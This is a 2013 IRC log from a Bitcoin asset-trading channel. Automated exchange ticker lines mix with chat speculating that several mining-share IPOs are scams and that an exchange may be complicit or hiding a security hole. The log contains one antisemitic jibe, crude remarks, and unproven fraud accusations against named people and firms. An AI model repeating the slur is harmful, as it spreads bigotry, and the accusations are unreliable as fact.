successfully reused addresses I generated several times; just not sure about house ones Aug 31 06:40:21 [BTCTC] [ACTIVEMINING] 1000 @ 0.0045 = 4.5 BTC [-] Aug 31 06:41:46 those you generate are safe for sure. Aug 31 06:42:02 in principle these should also, but i dun wanna mislead. Aug 31 06:43:11 [BTCTC] [TAT.ASICMINER] 111 @ 0.024 = 2.664 BTC [-] Aug 31 06:46:09 [BTCTC] [ACTIVEMINING] 8 @ 0.00457 = 0.0366 BTC [+] Aug 31 06:50:50 hehe that jorash guy asking the btc-anal channel the same quantum-mine-all-the-coins Aug 31 06:51:01 " jorash: that would obviously be the end of btc" Aug 31 06:51:34 [BTCTC] [TAT.ASICMINER] 50 @ 0.024 = 1.2 BTC [-] Aug 31 06:51:34 he was in here the other day talking about some asset he created for a quantum emulator or something Aug 31 06:51:38 i gave him the task of using the an0 to make himself a budget for the thing Aug 31 06:51:58 with the observation that the difference between a report and a budget is simply that one's forward facing whereas the other reflects the past. Aug 31 06:52:02 im curious what comes of it. Aug 31 06:52:15 he tried getting private funding through me, and asicminer, he's fishing in every pond he can dip his toes in Aug 31 06:52:38 a well. Aug 31 06:52:53 if people were more obedient and less inclined to self-manage the us wouldn't be collapsing in the first place. Aug 31 06:54:39 [BTCTC] [BASIC-MINING] 14 @ 0.1726 = 2.4164 BTC [-] Aug 31 06:55:15 [BTCTC] [BASIC-MINING] 1 @ 0.1725 BTC [-] Aug 31 06:55:32 [BTCTC] [BASIC-MINING] 1 @ 0.172 BTC [-] Aug 31 06:55:47 [BTCTC] [BASIC-MINING] 1 @ 0.171 BTC [-] Aug 31 06:56:04 [BTCTC] [BASIC-MINING] 5 @ 0.17 = 0.85 BTC [-] Aug 31 06:56:32 btc foundation lawyer, santori, reports on the meeting they had with US gov agencies Aug 31 06:56:33 http://letstalkbitcoin.com/e37-meeting-mastercoin/#.UiFoODasj2w Aug 31 06:56:35 E37 – Meeting Mastercoin | Lets Talk Bitcoin Aug 31 06:56:40 about 12min in is where he starts Aug 31 06:56:55 sounds like pretty much every possible giv dept was there\ Aug 31 06:56:59 gov* Aug 31 06:57:09 that's a fact. Aug 31 06:58:00 [BTCTC] [LABCOIN] 5 @ 0.003773 = 0.0189 BTC [+] Aug 31 06:58:01 [BTCTC] [LABCOIN] 20 @ 0.003774 = 0.0755 BTC [+] Aug 31 06:58:02 [BTCTC] [LABCOIN] 206 @ 0.00378 = 0.7787 BTC [+] Aug 31 06:58:04 [BTCTC] [LABCOIN] 50 @ 0.003782 = 0.1891 BTC [+] Aug 31 06:58:05 [BTCTC] [LABCOIN] 5 @ 0.003785 = 0.0189 BTC [+] Aug 31 06:58:06 [BTCTC] [LABCOIN] 754 @ 0.003786 = 2.8546 BTC [+] Aug 31 06:58:44 [BTCTC] [LABCOIN] 4 @ 0.003784 = 0.0151 BTC [-] Aug 31 06:58:58 fincen, irs, fdic, fed reserve, offic of comp of currency, fbi, dea, ss, dhs Aug 31 06:59:53 not like they have anything else to do. taxpayers pay, bureaucrats dick about all day. Aug 31 07:00:10 lol Aug 31 07:02:28 steange bitcoin ad: http://letstalkbitcoin.com/wp-content/uploads/useful_banner_manager_banners/9-EasyDNSLessCrazyGreen.jpg Aug 31 07:02:32 stange* Aug 31 07:02:35 strange* Aug 31 07:02:55 lol Aug 31 07:08:37 [BTCTC] [LTC-ATF.B2] 15 @ 0.01039 = 0.1559 BTC [-] Aug 31 07:08:39 [BTCTC] [LTC-ATF.B2] 185 @ 0.0104 = 1.924 BTC [+] Aug 31 07:14:09 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 31 07:24:04 [BTCTC] [DMS.SELLING] 531 @ 0.01251 = 6.6428 BTC [-] Aug 31 07:24:06 [BTCTC] [DMS.SELLING] 100 @ 0.0125 = 1.25 BTC [-] Aug 31 07:24:07 [BTCTC] [DMS.SELLING] 100 @ 0.01248 = 1.248 BTC [-] Aug 31 07:24:07 [BTCTC] [DMS.SELLING] 257 @ 0.01242 = 3.1919 BTC [-] Aug 31 07:26:18 [HAVELOCK] [AM100] 24 @ 0.025 = 0.6 BTC [+] Aug 31 07:29:59 [BTCTC] [LABCOIN] 20 @ 0.003628 = 0.0726 BTC [-] Aug 31 07:32:06 [BTCTC] [LABCOIN] 80 @ 0.003627 = 0.2902 BTC [-] Aug 31 07:32:08 [BTCTC] [LABCOIN] 135 @ 0.003612 = 0.4876 BTC [-] Aug 31 07:35:02 [MPEX] [S.MPOE] 3700 @ 0.00086766 = 3.2103 BTC [-] Aug 31 07:36:38 [BTCTC] [FIMB] 4 @ 0.0109 = 0.0436 BTC [+] Aug 31 07:37:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.02479 = 0.1983 BTC [+] Aug 31 07:38:13 [BTCTC] [TAT.ASICMINER] 21 @ 0.02479 = 0.5206 BTC [+] Aug 31 07:39:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.02479 = 0.2479 BTC [+] Aug 31 07:40:24 [BTCTC] [BITVPS] 1 @ 0.00262 BTC [-] Aug 31 07:40:43 [MPEX] [S.MPOE] 3025 @ 0.00086802 = 2.6258 BTC [+] Aug 31 07:40:45 [MPEX] [S.MPOE] 7275 @ 0.00087096 = 6.3362 BTC [+] Aug 31 07:43:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.02479 BTC [+] Aug 31 07:46:08 [BTCTC] [TAT.ASICMINER] 105 @ 0.024 = 2.52 BTC [-] Aug 31 07:46:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] Aug 31 07:48:34 [BTCTC] [DMS.PURCHASE] 2 @ 0.0159 = 0.0318 BTC [-] Aug 31 07:52:30 [BTCTC] [BASIC-MINING] 5 @ 0.17 = 0.85 BTC [-] Aug 31 07:52:31 [BTCTC] [BASIC-MINING] 6 @ 0.17 = 1.02 BTC [-] Aug 31 07:52:44 [BTCTC] [DMS.MINING] 2 @ 0.0033 = 0.0066 BTC [-] Aug 31 07:53:21 [BTCTC] [LABCOIN] 20 @ 0.003577 = 0.0715 BTC [-] Aug 31 07:53:23 [BTCTC] [LABCOIN] 110 @ 0.003576 = 0.3934 BTC [-] Aug 31 07:57:48 #github Aug 31 08:04:01 \ Aug 31 08:04:07 oops Aug 31 08:10:25 [BTCTC] [DMS.MINING] 3 @ 0.00337 = 0.0101 BTC [+] Aug 31 08:14:35 [HAVELOCK] [AM100] 20 @ 0.025 = 0.5 BTC [+] Aug 31 08:14:45 [BTCTC] [ACTIVEMINING] 1 @ 0.0044 BTC [-] Aug 31 08:14:46 [BTCTC] [ACTIVEMINING] 999 @ 0.0044 = 4.3956 BTC [-] Aug 31 08:15:22 [HAVELOCK] [CFIG] 3 @ 0.165 = 0.495 BTC [-] Aug 31 08:15:42 [HAVELOCK] [AM100] 20 @ 0.025 = 0.5 BTC [+] Aug 31 08:16:42 [BTCTC] [LABCOIN] 20 @ 0.003646 = 0.0729 BTC [+] Aug 31 08:16:43 [BTCTC] [LABCOIN] 20 @ 0.003647 = 0.0729 BTC [+] Aug 31 08:16:43 [BTCTC] [LABCOIN] 235 @ 0.003742 = 0.8794 BTC [+] Aug 31 08:16:44 [BTCTC] [LABCOIN] 80 @ 0.003744 = 0.2995 BTC [+] Aug 31 08:16:46 [BTCTC] [LABCOIN] 100 @ 0.003748 = 0.3748 BTC [+] Aug 31 08:16:47 [BTCTC] [LABCOIN] 245 @ 0.00375 = 0.9188 BTC [+] Aug 31 08:18:46 [HAVELOCK] [SDSTM] 30 @ 0.0035061 = 0.1052 BTC [+] Aug 31 08:19:18 [HAVELOCK] [SDSTM] 9 @ 0.003506 = 0.0316 BTC [-] Aug 31 08:19:47 [HAVELOCK] [SDSTM] 11 @ 0.00350001 = 0.0385 BTC [-] Aug 31 08:22:18 [HAVELOCK] [SDSTM] 1 @ 0.00439 BTC [+] Aug 31 08:35:43 [MPEX] [S.MPOE] 1473 @ 0.00087096 = 1.2829 BTC [+] Aug 31 08:35:44 [MPEX] [S.MPOE] 5877 @ 0.00087247 = 5.1275 BTC [+] Aug 31 08:38:30 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 31 08:38:32 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] **** BEGIN LOGGING AT Sat Aug 31 15:37:16 2013 Aug 31 15:37:44 dexX7 it's fascinating how everything starts out "the largest" Aug 31 15:43:08 and funny how website scams cant help but look like scams merely by their design style Aug 31 15:43:44 [BTCTC] [ACTIVEMINING] 10 @ 0.004301 = 0.043 BTC [+] Aug 31 15:43:46 [BTCTC] [ACTIVEMINING] 990 @ 0.0043 = 4.257 BTC [-] Aug 31 15:43:57 and further funny how nobody seems to realise that starting your life by comitting to a hugely ridiculous and vastly verifiable lie is pretty bad for your credibility. Aug 31 15:44:16 [BTCTC] [ASICMINER-PT] 2 @ 2.545 = 5.09 BTC [+] Aug 31 15:44:18 [BTCTC] [ASICMINER-PT] 1 @ 2.546 BTC [+] Aug 31 15:44:19 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [+] Aug 31 15:44:19 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [+] Aug 31 15:44:26 what if they're successful, ad absurdum ? i'll meet the guy at a conference in 2023 and say, o, you're the guy that was lieing in 2013 ? Aug 31 15:44:33 what's he gonna do then, herp at me really hard ? Aug 31 15:45:11 well he will ask you to eat his pudding Aug 31 15:45:24 [BTCTC] [BASIC-MINING] 6 @ 0.1699 = 1.0194 BTC [+] Aug 31 15:45:25 aok Aug 31 15:45:31 [BTCTC] [BASIC-MINING] 44 @ 0.17 = 7.48 BTC [+] Aug 31 15:45:34 [BTCTC] [BASIC-MINING] 1 @ 0.188 BTC [+] Aug 31 15:45:41 [BTCTC] [BASIC-MINING] 4 @ 0.1896 = 0.7584 BTC [+] Aug 31 15:45:48 [BTCTC] [BASIC-MINING] 6 @ 0.1898 = 1.1388 BTC [+] Aug 31 15:46:33 [BTCTC] [BASIC-MINING] 5 @ 0.1898 = 0.949 BTC [+] Aug 31 15:46:45 ;;google "eat my pudding" Aug 31 15:46:46 Dinner for Schmucks (2010) - Quotes - IMDb: ; You can eat my pudding. | Facebook: ; Before i eat my pudding i make sure i lick the lid until its clean ...: ThickAsThieves am i missing some subtext thar ? :D Aug 31 15:47:47 ;;google proof is in the pudding Aug 31 15:47:48 Urban Dictionary: the proof is in the pudding: ; The proof of the pudding - The Phrase Finder: ; The Origin Of 'Proof Is In The Pudding' : NPR: Aug 31 15:47:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.0247 = 0.0988 BTC [-] Aug 31 15:48:13 sorry, i was twisting it Aug 31 15:48:22 i wondered if it would translate Aug 31 15:48:35 a a Aug 31 15:48:36 [BTCTC] [RSM] 4 @ 0.0144 = 0.0576 BTC [-] Aug 31 15:48:49 well so duh, i'll link to logs.bitcoin-assets.com. Aug 31 15:48:53 not like it's hard to prove. Aug 31 15:49:03 sorta like the end justifies the means, in common use Aug 31 15:49:21 but what the fuck is the end ? making sure everyone takes you for a scammer ? Aug 31 15:49:37 no, making more money than you Aug 31 15:50:04 so fucking stupid that shit. Aug 31 15:50:21 why not just have a bigger penis than me. what the fuck happened to "doing something useful" Aug 31 15:50:23 the way people are these days, scamming isnt always hard to shake Aug 31 15:50:39 even OJ Simpson had a movie career after killing his wife Aug 31 15:51:56 anyway, so what's the plan, it'll call itself BiTBeTeC or BTBTC for short and print somewhere a line on the website going OVER 1500000000 BTC BET !!! Aug 31 15:52:14 hehe Aug 31 15:52:19 it feels like we're back to the old webpage days when people were adding visitor counters. Aug 31 15:52:38 this is one point of yours that i havent bought into yet Aug 31 15:52:42 i CAN believe it Aug 31 15:52:43 i guess it's my mistake that in adding volume lines on the actual sites i somehow gave the idiots the impression that a "real good copy" TM consists of LARGER DIGITS Aug 31 15:52:49 but without evidence it's hard Aug 31 15:52:55 ThickAsThieves which ? Aug 31 15:53:05 that the exchange might be complicit Aug 31 15:53:18 actively Aug 31 15:53:24 theswede has 50k btc of his own to just throw back and forth ? Aug 31 15:53:41 the labcoin IPO threw around about 15k Aug 31 15:54:06 twas btcgarden that was about 25k Aug 31 15:54:13 i recall you were here a month or so back when we did the math, and it was something ridiculous top the tune of 50k Aug 31 15:54:28 when you added the current scams Aug 31 15:54:32 was around there Aug 31 15:54:44 but anyway : there's two ways this can work. either burnside gave them "margin" on account that "he knows what he's doing" and "that's what exchanges do" iho, Aug 31 15:54:56 doubtful Aug 31 15:55:22 or else he has a security hole that he's too ashamed to admit. Aug 31 15:55:53 surely even he could not survive 40k btc from thin air Aug 31 15:55:56 or even half that Aug 31 15:56:02 these'd be the constructions that i can see making him two different flavours of stupid rather than actively complicit. Aug 31 15:56:04 or a quarter Aug 31 15:56:08 exactly. Aug 31 15:56:12 so play along buster. Aug 31 15:56:31 and what is this "Even he" ? Aug 31 15:56:41 you think it's less likely that it's the scammers throwing their weight around? Aug 31 15:56:43 for example Aug 31 15:56:51 burnside is a minor shit that ran a ltc exchange for a while to little avail, and then jumped on trying to make a glbse clone last year. Aug 31 15:57:03 suppose ActM, BTCGarden, Labcoin, and maybe some older ones are all the same group Aug 31 15:57:07 when did he become some sort of authority ? you probably have more assets than he ever did. Aug 31 15:57:11 surely theyd have amassed that kind of coin Aug 31 15:57:22 to now throw momentum into their scams Aug 31 15:57:24 ThickAsThieves they are mostly same group i'm pretty sure. Aug 31 15:57:36 nah, not quite. Aug 31 15:57:52 for example, Aug 31 15:58:00 i keep track of what scammers got. Aug 31 15:58:01 the labcoin IPO was 7k Aug 31 15:58:09 giga split with a lot of coin, but he's bought miners for them Aug 31 15:58:14 and i saw 15k of deposits Aug 31 15:58:20 orders* Aug 31 15:58:22 so I played Aug 31 15:58:25 owens etc group never made enough, kenna split with a lot vbuyt sold / lost most Aug 31 15:58:25 and banked Aug 31 15:58:33 there just isn't the coin available in scammor camp Aug 31 15:59:16 i think its safe to say that 7k coins got extracted from labcoin buyers Aug 31 15:59:28 i guess there's always the possibility that some smooth operator got the wool over the eyes of a backer, and bought a bunch of coins to finance a set of scams. Aug 31 15:59:28 which could easily have made up part of the btcgarden buyin Aug 31 15:59:43 add ActM to that Aug 31 15:59:44 ThickAsThieves i think that'd be way overshot. Aug 31 15:59:49 and you start getting there Aug 31 16:00:02 the muppets don't have that much. my guess is 500 to 2k on the brightest side. Aug 31 16:00:29 i think you underestimate how much coin is up for grabs Aug 31 16:00:41 well if we agreed it wouldn't be fun. Aug 31 16:00:45 :) Aug 31 16:04:05 [BTCTC] [ACTIVEMINING] 10 @ 0.0043 = 0.043 BTC [-] Aug 31 16:04:06 [BTCTC] [ACTIVEMINING] 6 @ 0.004251 = 0.0255 BTC [-] Aug 31 16:04:08 [BTCTC] [ACTIVEMINING] 25 @ 0.00425 = 0.1063 BTC [-] Aug 31 16:04:09 [BTCTC] [ACTIVEMINING] 156 @ 0.004219 = 0.6582 BTC [-] Aug 31 16:04:10 [BTCTC] [ACTIVEMINING] 39 @ 0.004217 = 0.1645 BTC [-] Aug 31 16:04:11 [BTCTC] [ACTIVEMINING] 55 @ 0.004196 = 0.2308 BTC [-] Aug 31 16:04:12 [BTCTC] [ACTIVEMINING] 220 @ 0.004195 = 0.9229 BTC [-] Aug 31 16:04:13 [BTCTC] [ACTIVEMINING] 6 @ 0.004172 = 0.025 BTC [-] Aug 31 16:04:14 [BTCTC] [ACTIVEMINING] 25 @ 0.004171 = 0.1043 BTC [-] Aug 31 16:04:15 [BTCTC] [ACTIVEMINING] 250 @ 0.004152 = 1.038 BTC [-] Aug 31 16:04:16 [BTCTC] [ACTIVEMINING] 208 @ 0.004151 = 0.8634 BTC [-] Aug 31 16:05:21 what movie career did oj simpson have ?! Aug 31 16:05:44 what the fuck, i have raw vids of about a dozen girls im probably going to straight delete as i can't be bothered to have edited Aug 31 16:05:50 do THEY have movie careers too ?! Aug 31 16:06:42 he had a few random cameos Aug 31 16:07:26 OJ SIMPON's career in film http://www.imdb.com/find?q=o.j.+simpson&s=all Aug 31 16:07:44 actually this is it http://www.imdb.com/name/nm0001740/?ref_=fn_al_nm_1 Aug 31 16:07:58 he was in the naked gun, the towering inferno, capricorn one Aug 31 16:08:12 Frogmen, CIA Code Name: Alexa Aug 31 16:08:24 http://www.imdb.com/name/nm0001740/?ref_=fn_al_nm_1 Aug 31 16:08:27 those are old movies Aug 31 16:08:28 O.J. Simpson - IMDb Aug 31 16:08:37 mostly he only was in naked gun Aug 31 16:08:44 no mostly he was in these: http://www.imdb.com/name/nm0001740/?ref_=fn_al_nm_1 Aug 31 16:09:16 pay attention Aug 31 16:09:23 the relevance is AFTER he murdered Aug 31 16:09:42 not every movie he ever showed up in Aug 31 16:10:18 [BTCTC] [DMS.PURCHASE] 6 @ 0.01591 = 0.0955 BTC [+] Aug 31 16:10:34 Oh I have been insulted by TAT Aug 31 16:10:44 the question was what Movies has OJ SImpson been in Aug 31 16:11:07 just shut up and make me money Aug 31 16:11:44 Diablo-D3: that was so clever! wait while I stand in shock Aug 31 16:11:57 a cultural reference that uses my name. Hip is written all over you Aug 31 16:12:59 mircea_popescu: could i push you s.mpoe in exchamge fr isk to pay my eve subscription? Aug 31 16:13:16 being told to pay attention is not an insult Aug 31 16:13:35 but indicitave of your personality Aug 31 16:13:46 is your reaction Aug 31 16:14:00 exchange* for* Aug 31 16:14:13 sure Aug 31 16:14:44 you are a unique * Aug 31 16:15:59 [BTCTC] [DMS.SELLING] 225 @ 0.01286 = 2.8935 BTC [+] Aug 31 16:16:00 [BTCTC] [DMS.SELLING] 275 @ 0.01287 = 3.5393 BTC [+] Aug 31 16:16:28 thestringpuller yep Aug 31 16:16:48 [BTCTC] [CRYPTO-TRADE] 22 @ 0.1987 = 4.3714 BTC [-] Aug 31 16:17:01 ;;asks 100000000 Aug 31 16:17:11 There are currently 39497.025 bitcoins offered at or under 100000000.0 USD, worth 619456548.901 USD in total. | Data vintage: 0.0088 seconds Aug 31 16:17:15 [BTCTC] [DMS.PURCHASE] 225 @ 0.01591 = 3.5798 BTC [+] Aug 31 16:17:21 clowncar exchange running out of btc Aug 31 16:18:06 clowncar exchange lmao Aug 31 16:18:20 ;;ticker Aug 31 16:18:20 MtGox BTCUSD ticker | Best bid: 143.81022, Best ask: 144.27039, Bid-ask spread: 0.46017, Last trade: 143.81021, 24 hour volume: 54609.74048310, 24 hour low: 128.89999, 24 hour high: 144.50000, 24 hour vwap: 137.43557 Aug 31 16:18:25 [HAVELOCK] [XBOND] 1 @ 0.00118 BTC [-] Aug 31 16:18:26 we're rich! Aug 31 16:18:51 [MPEX] [S.MPOE] 838 @ 0.00087394 = 0.7324 BTC [+] Aug 31 16:18:53 [MPEX] [S.MPOE] 4212 @ 0.00087396 = 3.6811 BTC [+] Aug 31 16:18:55 ThickAsThieves speak for yourself fatcat. i'm poverty stricken in my poverty strike. Aug 31 16:19:53 shoulda used gox Aug 31 16:20:38 Oh a confession Aug 31 16:20:48 [MPEX] [S.MPOE] 5800 @ 0.00087396 = 5.069 BTC [+] Aug 31 16:26:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] Aug 31 16:28:27 [HAVELOCK] [HIM] 1 @ 0.19 BTC [+] Aug 31 16:28:52 [BTCTC] [LABCOIN] 540 @ 0.003694 = 1.9948 BTC [-] Aug 31 16:30:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] Aug 31 16:30:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] Aug 31 16:30:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] Aug 31 16:30:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02399 BTC [-] Aug 31 16:30:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.02398 = 0.1199 BTC [-] Aug 31 16:30:41 [BTCTC] [TAT.ASICMINER] 13 @ 0.02397 = 0.3116 BTC [-] Aug 31 16:30:42 [BTCTC] [TAT.ASICMINER] 16 @ 0.02396 = 0.3834 BTC [-] Aug 31 16:38:56 [HAVELOCK] [AM1] 2 @ 2.45 = 4.9 BTC [-] Aug 31 16:39:17 there should be a meme thing, "hey yo, we know you're poor so we put some poverty in your poverty so you can be poor while you're poor" Aug 31 16:39:27 [BTCTC] [DMS.PURCHASE] 10 @ 0.01591 = 0.1591 BTC [+] Aug 31 16:39:44 [BTCTC] [ACTIVEMINING] 136 @ 0.004155 = 0.5651 BTC [+] Aug 31 16:39:45 [BTCTC] [ACTIVEMINING] 198 @ 0.004152 = 0.8221 BTC [-] Aug 31 16:39:47 [BTCTC] [ACTIVEMINING] 392 @ 0.004151 = 1.6272 BTC [-] Aug 31 16:39:48 [BTCTC] [ACTIVEMINING] 274 @ 0.004151 = 1.1374 BTC [-] Aug 31 16:40:09 id put some poverty in my poverty but im all out Aug 31 16:40:21 lol Aug 31 16:40:22 so porr. Aug 31 16:40:24 poor Aug 31 16:40:37 watch that porr means sexy in slovenian or some shit Aug 31 16:40:53 it just might Aug 31 16:42:45 [BTCTC] [ASICMINER-PT] 1 @ 2.514 BTC [-] Aug 31 16:43:36 [BTCTC] [ACTIVEMINING] 17 @ 0.004156 = 0.0707 BTC [+] Aug 31 16:43:37 [BTCTC] [ACTIVEMINING] 136 @ 0.004155 = 0.5651 BTC [-] Aug 31 16:43:38 [BTCTC] [ACTIVEMINING] 31 @ 0.004152 = 0.1287 BTC [-] Aug 31 16:43:39 [BTCTC] [ACTIVEMINING] 126 @ 0.004151 = 0.523 BTC [-] Aug 31 16:43:40 [BTCTC] [ACTIVEMINING] 690 @ 0.004102 = 2.8304 BTC [-] Aug 31 16:45:05 ThickAsThieves anyway, wasn't btcgarden fully refunded ? Aug 31 16:45:26 ipo price + fees Aug 31 16:45:52 so consequently it can't count in our discussion. Aug 31 16:46:42 what's the topic? Aug 31 16:47:00 "how are scams on btct done?" Aug 31 16:49:35 [HAVELOCK] [CFIG] 40 @ 0.165 = 6.6 BTC [-] Aug 31 16:50:44 [BTCTC] [ASICMINER-PT] 1 @ 2.514 BTC [-] Aug 31 16:52:40 something like that Aug 31 16:54:33 http://bitbet.us/bet/467/usd-btc-exchange-rate-to-top-125-at-23-45/ Aug 31 16:54:41 i guess this is pretty lulzy in retrospect. Aug 31 16:54:42 BitBet - USD/BTC exchange rate to top $125 at 23:45 September 16, 2013 Aug 31 16:54:44 [BTCTC] [ASICMINER-PT] 1 @ 2.513 BTC [-] Aug 31 16:54:57 MtGox BTCUSD ticker | Best bid: 143.02837, Best ask: 143.44000, Bid-ask spread: 0.41163, Last trade: 143.44000, 24 hour volume: 55193.90154691, 24 hour low: 128.89999, 24 hour high: 144.50000, 24 hour vwap: 137.57729 Aug 31 16:56:28 "good goy, now spend more of your shekels on my exchange" Aug 31 16:56:32 [BTCTC] [ACTIVEMINING] 2 @ 0.004392 = 0.0088 BTC [+] Aug 31 16:59:30 https://bitcointalk.org/index.php?topic=284138.0 Aug 31 16:59:33 kickass title. Aug 31 16:59:37 Lawsuite against BFL Aug 31 16:59:47 [MPEX] [S.MPOE] 4108 @ 0.00087396 = 3.5902 BTC [+] Aug 31 16:59:49 [MPEX] [S.MPOE] 4392 @ 0.00087455 = 3.841 BTC [+] Aug 31 17:01:30 [BTCTC] [ACTIVEMINING] 400 @ 0.004384 = 1.7536 BTC [-] Aug 31 17:02:18 [BTCTC] [ASICMINER-PT] 4 @ 2.53 = 10.12 BTC [+] **** BEGIN LOGGING AT Sat Aug 31 17:06:53 2013 Aug 31 17:10:53 [HAVELOCK] [AM100] 2 @ 0.0249 = 0.0498 BTC [-] Aug 31 17:11:11 [BTCTC] [DMS.MINING] 158 @ 0.0033 = 0.5214 BTC [+] Aug 31 17:14:04 [HAVELOCK] [LABCO] 600 @ 0.0032 = 1.92 BTC [+] Aug 31 17:18:53 [BTCTC] [DMS.PURCHASE] 938 @ 0.01591 = 14.9236 BTC [+] Aug 31 17:20:15 [BTCTC] [LABCOIN] 20 @ 0.003693 = 0.0739 BTC [-] Aug 31 17:20:17 [BTCTC] [LABCOIN] 227 @ 0.003694 = 0.8385 BTC [+] Aug 31 17:20:18 [BTCTC] [LABCOIN] 2000 @ 0.003698 = 7.396 BTC [+] Aug 31 17:21:47 [BTCTC] [LABCOIN] 50 @ 0.00373 = 0.1865 BTC [+] Aug 31 17:21:48 [BTCTC] [LABCOIN] 31 @ 0.003737 = 0.1158 BTC [+] Aug 31 17:22:26 [BTCTC] [DMS.MINING] 87 @ 0.00333 = 0.2897 BTC [+] Aug 31 17:24:01 [BTCTC] [DMS.MINING] 100 @ 0.00334 = 0.334 BTC [+] Aug 31 17:25:17 [BTCTC] [DMS.MINING] 457 @ 0.00335 = 1.531 BTC [+] Aug 31 17:28:37 so consequently it can't count in our discussion. <<<< possibly, but it's a wtf worth exploring Aug 31 17:28:43 it was like 25k btc Aug 31 17:28:46 and it sold out Aug 31 17:29:11 odd that i'm one of the few people wondering where the hell that much coin came from Aug 31 17:29:33 for an IPO with barely any press and no real history Aug 31 17:29:37 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [+] Aug 31 17:31:47 [BTCTC] [LABCOIN] 256 @ 0.003737 = 0.9567 BTC [+] Aug 31 17:31:48 [BTCTC] [LABCOIN] 2000 @ 0.003739 = 7.478 BTC [+] Aug 31 17:31:49 [BTCTC] [LABCOIN] 15 @ 0.003774 = 0.0566 BTC [+] Aug 31 17:31:50 [BTCTC] [LABCOIN] 279 @ 0.003774 = 1.0529 BTC [+] Aug 31 17:32:00 [BTCTC] [DMS.MINING] 115 @ 0.00329 = 0.3784 BTC [-] Aug 31 17:32:41 you have to admit the "we made it up" is by far the simpler explanation Aug 31 17:32:45 occam razor and all that. Aug 31 17:33:15 [BTCTC] [DMS.MINING] 450 @ 0.0033 = 1.485 BTC [+] Aug 31 17:36:07 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] Aug 31 17:36:44 [BTCTC] [ACTIVEMINING] 3 @ 0.004199 = 0.0126 BTC [-] Aug 31 17:39:05 pankkake lol what forums didja get banned on? Aug 31 17:42:52 [BTCTC] [ASICMINER-PT] 5 @ 2.53 = 12.65 BTC [-] Aug 31 17:48:02 [BTCTC] [BTC-BOND] 20 @ 0.00999 = 0.1998 BTC [-] Aug 31 17:54:26 [BTCTC] [BFMINES] 5 @ 0.0025 = 0.0125 BTC [+] Aug 31 17:58:01 [BTCTC] [ACTIVEMINING] 250 @ 0.004303 = 1.0758 BTC [+] Aug 31 18:00:35 [BTCTC] [LABCOIN] 20 @ 0.003755 = 0.0751 BTC [-] Aug 31 18:01:30 [BTCTC] [LABCOIN] 20 @ 0.003653 = 0.0731 BTC [-] Aug 31 18:01:46 [BTCTC] [LABCOIN] 80 @ 0.003653 = 0.2922 BTC [-] Aug 31 18:03:18 [BTCTC] [LABCOIN] 250 @ 0.003772 = 0.943 BTC [+] Aug 31 18:04:11 [BTCTC] [LABCOIN] 33 @ 0.003772 = 0.1245 BTC [+] Aug 31 18:04:28 [BTCTC] [LABCOIN] 200 @ 0.003772 = 0.7544 BTC [+] Aug 31 18:04:32 well btc-garden has some history in china and was probably only unknown to us westeners Aug 31 18:04:40 [BTCTC] [LABCOIN] 17 @ 0.003772 = 0.0641 BTC [+] Aug 31 18:05:13 [BTCTC] [LABCOIN] 206 @ 0.003772 = 0.777 BTC [+] Aug 31 18:05:14 [BTCTC] [LABCOIN] 24 @ 0.003774 = 0.0906 BTC [+] Aug 31 18:06:33 [BTCTC] [ACTIVEMINING] 50 @ 0.004301 = 0.2151 BTC [-] Aug 31 18:07:13 [BTCTC] [ACTIVEMINING] 50 @ 0.004302 = 0.2151 BTC [+] Aug 31 18:08:05 [BTCTC] [ACTIVEMINING] 150 @ 0.004305 = 0.6458 BTC [+] Aug 31 18:08:30 [BTCTC] [DMS.MINING] 488 @ 0.0033 = 1.6104 BTC [+] Aug 31 18:09:57 [HAVELOCK] [LABCO] 1 @ 0.00319 BTC [-] Aug 31 18:10:53 [BTCTC] [LABCOIN] 189 @ 0.003772 = 0.7129 BTC [-] Aug 31 18:11:22 mircea_popescu: mostly French forums (one multiple times). I remember blogs (last one was Adria Richards, even banned me from reading), what.cd Aug 31 18:11:39 what did you do on what? Aug 31 18:11:58 lmao what! what'd you do to the richards character Aug 31 18:12:01 piss off people? Aug 31 18:12:23 hehe Aug 31 18:12:24 I wrote that her actions were actually discouraging women to get info the profession Aug 31 18:12:29 it wasn't even harsh Aug 31 18:12:30 dexX7 not quite. Aug 31 18:12:52 pankkake you seem to be a natural Aug 31 18:12:52 pankkake well yeah, the sane criticisms are the worst from what i see. Aug 31 18:13:01 anyway, where is that thing Aug 31 18:13:04 [MPEX] [S.MPOE] 4350 @ 0.00087255 = 3.7956 BTC [-] Aug 31 18:13:07 ;;google trolling something awful competition Aug 31 18:13:08 The Trolling Something Awful competition pe Trilema - Un blog de ...: ; Something Awful - Wikipedia, the free encyclopedia: ; Trolls and the trolls who troll them | HASTAC: Aug 31 18:13:29 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [-] Aug 31 18:14:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.02463 = 0.1232 BTC [+] Aug 31 18:16:03 [MPEX] [S.MPOE] 4350 @ 0.00087255 = 3.7956 BTC [-] Aug 31 18:16:07 [MPEX] [S.MPOE] 7500 @ 0.00087075 = 6.5306 BTC [-] Aug 31 18:16:08 [MPEX] [S.MPOE] 5535 @ 0.00086953 = 4.8128 BTC [-] Aug 31 18:16:55 [HAVELOCK] [AM100] 8 @ 0.02479 = 0.1983 BTC [-] Aug 31 18:16:58 [HAVELOCK] [AM100] 18 @ 0.0248 = 0.4464 BTC [+] Aug 31 18:17:02 [HAVELOCK] [AM100] 24 @ 